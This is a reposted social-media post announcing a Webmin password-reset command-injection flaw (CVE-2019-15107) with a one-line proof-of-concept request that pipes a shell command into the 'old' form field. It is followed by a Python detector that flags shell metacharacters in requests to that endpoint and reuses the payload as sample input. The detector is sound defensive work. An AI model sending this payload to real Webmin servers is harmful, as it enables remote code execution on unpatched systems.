RT @shishi0_@twitter.com

"Webmin 0day remote code execution"

Tl;Dr: Lack of input validation in the reset password function allows RCE (CVE-2019-15107). Over 13 0000 vulnerable on Shodan.

PoC:
/password_reset.cgi
user=root&pam&expired&old=wrong | id

pentest.com.tr/exploits/DEFCON

🐦🔗: twitter.com/shishi0_/status/11
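
A defender-side check for the request shape quoted in the post above, as an added example that is not part of the original post: it decodes the form body of POSTs to /password_reset.cgi and reports fields that carry shell metacharacters. The function names, the metacharacter set and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Assumed set of characters a shell treats as separators, pipes,
# redirections or substitutions. Legitimate passwords can contain some
# of these, so a hit is a lead for triage, not proof of exploitation.
SHELL_META = re.compile(r"[|;&`$<>\n\r]")
TARGET_PATH = "/password_reset.cgi"


def suspicious_fields(method, url, body):
    """Return names of form fields in a password_reset.cgi POST whose
    URL-decoded value contains a shell metacharacter."""
    if method.upper() != "POST":
        return []
    # Match on the path only, so a query string or URL prefix does not hide it.
    if not urlsplit(url).path.rstrip("/").endswith(TARGET_PATH):
        return []
    # parse_qsl decodes %XX and '+', so encoded pipes (%7C) are caught too;
    # keep_blank_values keeps bare keys such as 'pam' and 'expired'.
    fields = parse_qsl(body, keep_blank_values=True)
    return [name for name, value in fields if SHELL_META.search(value)]


def scan(requests):
    """Return (index, fields) for every request that has flagged fields."""
    hits = []
    for i, (method, url, body) in enumerate(requests):
        flagged = suspicious_fields(method, url, body)
        if flagged:
            hits.append((i, flagged))
    return hits


# Constructed sample requests (method, URL, body), not captured traffic.
SAMPLE_REQUESTS = [
    ("POST", "/password_reset.cgi", "user=root&pam&expired&old=wrong | id"),
    ("POST", "/password_reset.cgi", "user=root&old=wrong%7Cid"),
    ("POST", "/password_reset.cgi", "user=alice&old=Summer2019"),
    ("GET", "/password_reset.cgi", ""),
    ("POST", "/index.cgi", "user=a&pass=x|y"),
]

if __name__ == "__main__":
    for index, names in scan(SAMPLE_REQUESTS):
        print(f"request {index}: metacharacters in {names}")
```
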
